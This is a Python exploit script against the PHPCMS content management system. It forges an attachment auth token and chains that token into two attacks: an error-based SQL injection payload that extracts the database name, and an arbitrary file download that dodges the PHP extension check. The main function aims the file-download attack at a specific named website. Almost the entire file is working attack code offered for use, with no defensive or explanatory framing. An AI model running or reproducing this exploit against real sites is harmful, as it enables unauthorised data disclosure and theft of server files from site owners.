# -*- coding: utf-8 -*-
# @Author: King kaki
# @Date:   2018-07-08 16:08:31
# @Last Modified by:   King kaki
# @Last Modified time: 2018-07-14 12:21:34
import requests
import re

class PHPCMS():
	def __init__(self, url):
		self.url = self._genurl(url)


	def _genurl(self, url):
		url = url.strip()
		if not url.startswith('http'):
			url = 'http://'+url
		if url.endswith('/'):
			return url
		else:
			return url+'/'

	def _getuserid(self):
		url = self.url + 'index.php?m=wap'
		r = requests.get(url)

		return r.headers['Set-Cookie'][13:]

	def get_auth(self, payload):
		url = self.url+'index.php?m=attachment&c=attachments&a=swfupload_json&aid=1'
		userid = self._getuserid()

		r = requests.post(url,params={'src':payload} , data={'userid_flash': userid})

		for x, y in re.findall(r'([^;, ]+)=([^;, ]+)', r.headers['Set-Cookie']):
			if 'att_json' in x:
				return y
		return False

	def sqli(self):
		url = self.url+'index.php?m=content&c=down'
		payload = "&id=%2*7and updatexml(1,concat(1,(database())),1)#&m=1&modelid=1&catid=1&f=1"
		a_k = self.get_auth(payload)

		r = requests.get(url, params={'a_k': a_k})
		# print(r.text)
		print(re.findall(r"XPATH syntax error: '(.+?)'", r.text))

	def filedown(self, filename):
		url = self.url + 'index.php?m=content&c=down&a=init'
		payload = r'pad=x&i=1&modelid=1&catid=1&d=1&m=1&s={}&f=.p%253chp'.format(filename)
		a_k = self.get_auth(payload)

		r = requests.get(url, params={'a_k': a_k})
		print(r.text)

		match = re.search(r'<a href="(.+?)" class="xzs_btn"', r.text)
		if match is not None:
		 	# print(match.group(1))
		 	r = requests.get(self.url+'index.php'+match.group(1))
		 	print(r.text)
		else:
			print('error')


def main():
	exp = PHPCMS('http://www.englpin.com')
	exp.filedown('index')
	# print(exp.get_auth('pad=x&i=1&modelid=1&catid=1&d=1&m=1&s=index&f=.p%253chp'))



if __name__ == '__main__':
	main()




